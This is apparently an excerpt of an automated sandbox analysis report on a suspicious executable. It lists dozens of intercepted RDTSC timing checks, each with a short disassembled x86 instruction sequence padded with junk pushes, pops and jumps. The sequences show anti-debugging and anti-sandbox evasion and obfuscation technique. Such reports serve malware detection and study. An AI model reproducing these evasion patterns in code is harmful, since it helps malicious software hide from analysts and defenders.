              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 90642E second address: 9064A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA6411h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007EFD88CA641Eh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007EFD88CA6408h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b pushad 0x0000002c add bl, 00000071h 0x0000002f popad 0x00000030 lea eax, dword ptr [ebp+12478E8Ch] 0x00000036 xor dx, 0F3Ch 0x0000003b nop 0x0000003c push eax 0x0000003d push edx 0x0000003e push ebx 0x0000003f jl 00007EFD88CA6406h 0x00000045 pop ebx 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9064A1 second address: 9064BE instructions: 0x00000000 rdtsc 0x00000002 je 00007EFD88B5ADB8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007EFD88B5ADBCh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9064BE second address: 9064D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA6416h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9064D8 second address: 9064F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD88B5ADC9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9064F5 second address: 8EE3D1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jp 00007EFD88CA6406h 0x0000000f call dword ptr [ebp+1244C146h] 0x00000015 jc 00007EFD88CA641Ah 0x0000001b push eax 0x0000001c push edx 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 8EE3D1 second address: 8EE3D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 8EE3D5 second address: 8EE3DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 936DFF second address: 936E1E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007EFD88B5ADB6h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007EFD88B5ADC1h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 93B81E second address: 93B824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 93B824 second address: 93B82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 93BE22 second address: 93BE3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA6418h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 93C2D3 second address: 93C2DD instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFD88B5ADB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 943E18 second address: 943E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 943E21 second address: 943E70 instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFD88B5ADC9h 0x00000008 jmp 00007EFD88B5ADC3h 0x0000000d jo 00007EFD88B5ADD6h 0x00000013 jmp 00007EFD88B5ADC5h 0x00000018 jmp 00007EFD88B5ADBBh 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push esi 0x00000020 pushad 0x00000021 push edi 0x00000022 pop edi 0x00000023 jc 00007EFD88B5ADB6h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9442C3 second address: 944306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA640Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007EFD88CA640Eh 0x0000000f push edx 0x00000010 pop edx 0x00000011 jbe 00007EFD88CA6406h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007EFD88CA6411h 0x0000001f jmp 00007EFD88CA6412h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 944306 second address: 94430A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 94430A second address: 94433C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007EFD88CA6406h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007EFD88CA640Eh 0x00000012 pushad 0x00000013 jmp 00007EFD88CA640Dh 0x00000018 jno 00007EFD88CA6406h 0x0000001e push edi 0x0000001f pop edi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 944493 second address: 944497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 944497 second address: 9444AC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007EFD88CA640Dh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 944636 second address: 94463A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 94463A second address: 944641 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 944641 second address: 944647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 944647 second address: 94464D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 944BEE second address: 944C3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88B5ADBBh 0x00000007 jg 00007EFD88B5ADB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007EFD88B5ADBAh 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 jp 00007EFD88B5ADB6h 0x0000001e jmp 00007EFD88B5ADBEh 0x00000023 pop edi 0x00000024 jmp 00007EFD88B5ADC6h 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9453AA second address: 9453C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD88CA6415h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 94A80F second address: 94A818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 94A818 second address: 94A85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD88CA6416h 0x00000009 pop edx 0x0000000a popad 0x0000000b pushad 0x0000000c jp 00007EFD88CA641Eh 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007EFD88CA6416h 0x00000019 push esi 0x0000001a jnc 00007EFD88CA6406h 0x00000020 pop esi 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 94CB99 second address: 94CBBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b jmp 00007EFD88B5ADBBh 0x00000010 pop ebx 0x00000011 jg 00007EFD88B5ADBCh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 94C8A5 second address: 94C8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 94C8A9 second address: 94C8AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 94C8AD second address: 94C8B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 94C8B5 second address: 94C8C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007EFD88B5ADB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 94C8C0 second address: 94C8CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 94C8CD second address: 94C8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 94C8D1 second address: 94C8DB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFD88CA6406h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9C60A2 second address: 9C60A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9C5F73 second address: 9C5F77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9C5F77 second address: 9C5F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9C2865 second address: 9C286A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9D2BA3 second address: 9D2BAE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9D2BAE second address: 9D2BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007EFD88CA6406h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9D46F4 second address: 9D46FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9D46FC second address: 9D4701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9D4701 second address: 9D471C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFD88B5ADC0h 0x00000008 pushad 0x00000009 jnc 00007EFD88B5ADB6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EA1DB second address: 9EA1E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EA1E1 second address: 9EA1EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007EFD88B5ADB6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EA1EE second address: 9EA222 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007EFD88CA6406h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007EFD88CA6410h 0x0000001b jmp 00007EFD88CA640Bh 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EA3A6 second address: 9EA3DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jg 00007EFD88B5ADB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007EFD88B5ADC2h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007EFD88B5ADC3h 0x0000001b push edi 0x0000001c pop edi 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EA3DD second address: 9EA3E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EA3E1 second address: 9EA3E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EA3E7 second address: 9EA3FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007EFD88CA6406h 0x00000009 jg 00007EFD88CA6406h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EAAA5 second address: 9EAAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFD88B5ADB6h 0x0000000a pop ecx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EAAB0 second address: 9EAAB5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EAAB5 second address: 9EAADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jp 00007EFD88B5ADB6h 0x0000000c push edi 0x0000000d pop edi 0x0000000e jnc 00007EFD88B5ADB6h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push esi 0x0000001e pop esi 0x0000001f jo 00007EFD88B5ADB6h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EAADA second address: 9EAADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EAADE second address: 9EAAFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFD88B5ADC7h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EAAFB second address: 9EAB01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EAB01 second address: 9EAB07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EAB07 second address: 9EAB0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EAC6E second address: 9EAC89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007EFD88B5ADC5h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EAC89 second address: 9EAC8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EAC8D second address: 9EAC98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EDA45 second address: 9EDA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EDA4E second address: 9EDA52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EDB43 second address: 9EDB48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EDB48 second address: 9EDB4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EDCD3 second address: 9EDCDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EDCDC second address: 9EDCEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9EDFE1 second address: 9EDFE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 506021A second address: 5060220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 5060220 second address: 5060224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 5060224 second address: 5060277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007EFD88B5ADBCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 push ecx 0x00000013 mov esi, edx 0x00000015 pop ebx 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a mov edx, 39697F14h 0x0000001f pushfd 0x00000020 jmp 00007EFD88B5ADBDh 0x00000025 sbb si, F3D6h 0x0000002a jmp 00007EFD88B5ADC1h 0x0000002f popfd 0x00000030 popad 0x00000031 pop ebp 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 5060277 second address: 506027B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 506027B second address: 5060281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 5060369 second address: 506036D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 506036D second address: 50603A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, dx 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007EFD88B5ADBEh 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007EFD88B5ADC7h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 50603A2 second address: 50603D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA6419h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007EFD88CA640Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 50603D6 second address: 50603DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 50603DA second address: 50603F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA6419h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 50603F7 second address: 5060407 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD88B5ADBCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 50604A1 second address: 50604A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 50604A5 second address: 50604AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 50604AB second address: 50604B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 506052C second address: 5060549 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, ECh 0x00000005 mov dl, al 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a inc edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007EFD88B5ADC0h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 5060549 second address: 506052C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA640Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007EFD88CA6414h 0x00000012 adc ecx, 72B7C718h 0x00000018 jmp 00007EFD88CA640Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007EFD88CA6418h 0x00000024 and si, B178h 0x00000029 jmp 00007EFD88CA640Bh 0x0000002e popfd 0x0000002f popad 0x00000030 jne 00007EFD88CA636Dh 0x00000036 mov al, byte ptr [edx] 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007EFD88CA640Eh 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 50605D7 second address: 50605F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88B5ADC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
